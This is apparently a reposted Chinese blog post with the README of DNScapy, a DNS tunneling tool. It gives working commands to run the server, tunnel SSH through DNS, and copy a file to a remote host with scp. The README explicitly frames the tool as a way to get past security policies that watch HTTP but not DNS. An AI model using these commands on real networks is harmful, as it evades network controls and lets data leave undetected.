git clone https://github.com/cr0hn/dnscapy.git
easy_install Scapy
服务端:
python dnscapy_server.py a.friendsxxx.com 45.77.39.xxx
客户端:
ssh -o ProxyCommand="sudo python dnscapy_client.py a.friendsxxx.com 45.77.39.xxx" [email protected]
其中:a.friendsxxx.com是我dns tunnel的域名,而45.77.39.xxx是我的域名解析服务器IP(将a.friendsxxx.com的所有解析交给45.77.39.xxx)。
然后就可以访问ssh了。
传输文件:
scp -o ProxyCommand='sudo python dnscapy_client.py a.friendsxxx.com 45.77.39.xxx' wanted_file [email protected]:/tmp/
抓包分析下:
sudo tcpdump -i enp0s3 port 53 -w ~/dns_tunnel_tool/dnscapy/dnscapy_ssh.pcap
wireshark打开:
可以看到其传输数据的样子。
DNScapy is a DNS tunneling tool. The code is very light and written in Python. It includes a server and a client. The server can handle multiple clients.
DNScapy creates a SSH tunnel through DNS packets. SSH connection, SCP and proxy socks (SSH -D) are supported. You can use CNAME records or TXT records for the tunnel. The default mode is RAND, which uses randomly both CNAME and TXT.
DNScapy is still under development. The current version is 0.99b and seems to work pretty well. Feel free to clone and test it !
Software Requirements
Note : once scapy is installed you have to patch a missing import.
Hardware Requirements
To make a real DNS tunnel, you will need:
Here is a very short guide:
sudo python dnscapy_server.py [DELEGATED_ZONE_NAME] [EXTERNAL_IP_ADDR]
ssh -o ProxyCommand="sudo python dnscapy_client.py [DELEGATED_ZONE_NAME] [IP_ADDR_OF_CLIENT_DNS]" yourlogin@localhost
./dnscapy_client.py -h ./dnscapy_server.py -h
It will not work if both client and server are on localhost. If you want to test it on the same computer I suggest to use a virtual machine. Why making a DNS tunnel ?
Because in most cases a security policy takes care of HTTP and forgets DNS. Let's consider two common situations:
In general, nothing is done to control the DNS resolution. Therefore you can break the two previous restrictions by making a DNS tunnel.
DISCLAIMER: We are not responsible at all for misuse of DNScapy. Bypassing a security policy is forbidden. Please use DNScapy only for test purposes in order to detect potential security holes in your own network. Why a SSH tunnel through DNS ?
本文转自张昺华-sky博客园博客,原文链接:http://www.cnblogs.com/bonelee/p/8037761.html,如需转载请自行联系原作者
![Mac|Windows系统本地照片自动上传到服务器[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)